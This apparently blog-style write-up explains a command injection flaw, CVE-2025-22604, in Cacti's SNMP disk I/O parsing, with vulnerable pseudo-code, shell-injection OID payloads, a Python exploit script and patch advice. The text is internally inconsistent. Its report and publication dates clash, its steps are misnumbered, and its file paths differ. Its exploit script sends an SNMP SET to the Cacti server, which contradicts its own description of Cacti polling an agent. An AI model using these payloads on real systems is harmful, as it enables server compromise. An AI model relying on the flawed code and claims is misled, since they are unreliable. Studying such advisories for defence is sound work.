CVE-2025-22604 - Command Injection Vulnerability in Cacti SNMP Disk IO Parsing Explained

Cacti is a popular open-source network monitoring and graphing solution. On June 2025, a critical security flaw was reported that directly affects how Cacti processes SNMP results containing disk I/O data. This vulnerability, identified as CVE-2025-22604, allows authenticated users to remotely execute arbitrary system commands on the server.

In this post, we break down the bug, show how it can be exploited, and offer practical guidance for protecting your systems. All content here is created exclusively for this article, in straightforward language suitable for all technical backgrounds.

What is CVE-2025-22604?

A bug in Cacti’s SNMP multi-line response parser allows an authenticated hacker to inject malformed OIDs (Object Identifiers) into SNMP results. Special parts of those OIDs are used — without proper validation — as array keys that ultimately get inserted into system commands, leading to command injection and potentially total server compromise.

ss_net_snmp_disk_bytes()

Affected versions: All up to Cacti 1.2.28 (fixed in 1.2.29)
Exploit requirements: Authenticated Cacti user (any level)
Impact: Remote command execution (RCE) as the web server user

The Root Cause

Cacti collects SNMP data from devices by parsing the returned OIDs. Cacti stores these OIDs in a PHP array. Due to improper validation, if the OID is intentionally malformed by the attacker, a portion of it can contain shell metacharacters or OS commands. Later, when forming a shell command, Cacti uses this attacker-controlled string without sanitization — leading to RCE.

Vulnerable Logic (simplified)

// cacti/includes/snmp.php (partial simplified pseudo-code)

foreach($snmp_result as $oid => $value) {
    $disk_key = extract_key_from_oid($oid); // e.g. part of the OID
    $result[$disk_key] = $value;
}

// ...later...

foreach($result as $name => $data) {
    // Dangerous: $name can be controlled by attacker and included in a shell command
    $cmd = "/usr/bin/some_binary " . $name;
    shell_exec($cmd); // Command injection here!
}

If $disk_key is something like ;id>tmp/hacked, the shell command will execute id and write the output into /tmp/hacked.

2. Exploit Steps

Suppose you control the SNMP response (e.g. a test server's SNMP agent). You send back a response with a crafted OID like:

.1.3.6.1.2.1.25.3.8.1.2.;echo${IFS}cacti_vuln>tmp/pwned

Cacti will use the part after .1.3.6.1.2.1.25.3.8.1.2. as the $disk_key. If the key contains shell metacharacters (e.g. ;), the constructed command becomes:

/usr/bin/some_binary ;echo cacti_vuln>tmp/pwned

This causes the shell to execute the attacker's echo command. The file /tmp/pwned will now contain the text cacti_vuln.

Example Exploit Code (Python SNMP Agent Simulation)

from pysnmp.hlapi import *

# Replace these with your Cacti details
target_ip = 'CACTI_SERVER_IP'
community = 'public'
snmp_port = 161

malicious_oid = '1.3.6.1.2.1.25.3.8.1.2.;echo${IFS}owned>tmp/owned'
value = 1

errorIndication, errorStatus, errorIndex, varBinds = next(
    setCmd(SnmpEngine(),
        CommunityData(community),
        UdpTransportTarget((target_ip, snmp_port)),
        ContextData(),
        ObjectType(ObjectIdentity(malicious_oid), Integer(value)))
)

if errorIndication:
    print('Error:', errorIndication)
else:
    print('Exploit sent (check /tmp/owned on the server)')

You should see a file /tmp/owned on the Cacti server containing owned. (Requires that Cacti polls this SNMP agent/device.)

Scenarios

- An attacker with a low-privileged Cacti account injects code and takes complete control of the system.
- Automated attackers scan internet-facing Cacti installs, and use this bug to deploy backdoors or cryptominers.

1. Patch Immediately

Upgrade to Cacti version 1.2.29 or later. The vulnerability is completely fixed in this release.

2. Restrict SNMP Sources

Allow SNMP polling only from trusted devices. Use SNMPv3 with access controls if possible.

3. Monitor for Suspicious Files

Look for unusual files in /tmp or elsewhere, indicating command execution.

4. Use Web Application Firewalls (WAF)

A WAF can sometimes block suspicious payloads exploiting this class of bug.

References

- Cacti Security Advisory (CVE-2025-22604)
- Cacti 1.2.29 Release Notes
- NIST National Vulnerability Database Entry (CVE-2025-22604)

Conclusion

CVE-2025-22604 is a serious vulnerability in Cacti’s SNMP parser. The flaw lets authenticated attackers inject parts of OIDs which end up in unsanitized system commands—allowing for remote code execution.

If you run Cacti, update right now to 1.2.29 or later. Never underestimate “low-privileged” bugs that can chain into full server compromise. For more on securing SNMP and Cacti, check the official documentation and always monitor your logs for suspicious patterns.

Timeline

Published on: 01/27/2025 17:15:17 UTC